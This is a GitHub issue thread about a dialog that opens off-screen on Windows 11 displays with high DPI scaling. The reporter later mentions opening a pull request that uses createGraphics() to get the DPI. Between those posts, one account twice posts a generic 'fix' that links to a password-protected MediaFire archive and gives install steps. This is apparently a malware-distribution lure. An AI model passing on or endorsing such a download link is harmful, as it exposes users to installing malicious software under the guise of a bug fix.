### ISSUE TITLE
`MoveWindowAndEnsureVisibile()` can break on displays with more than 100% scaling

### ISSUE THREAD

**Issue by BashPrime** [Brian0255/Track-O-Matic#2]
When `MoveWindowAndEnsureVisibile()` is called to open the hint dialog, the pixel values for `window` and `currentScreen` are always unscaled, regardless of the scaling value of the display.

After the move window function is called, if the left or top position of the window is greater than the scaled width or height of the display, it will open off-screen and fail to render. I am unable to move the dialog or use it in any capacity unless I can get the dialog to open from as close to 0 as possible for window.left/window.top.

Apparently the display scaling is handled differently in Windows 11 than in Windows 10 and older. I'm looking into a solution that isn't complete ass.

Tested on my Windows 11 laptop. Display is 2880x1800 pixels at 175% scaling.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by BashPrime** [comment]
I've applied a fix and created a PR, hopefully I'm not doing anything garbage with using `createGraphics()` to get the DPI
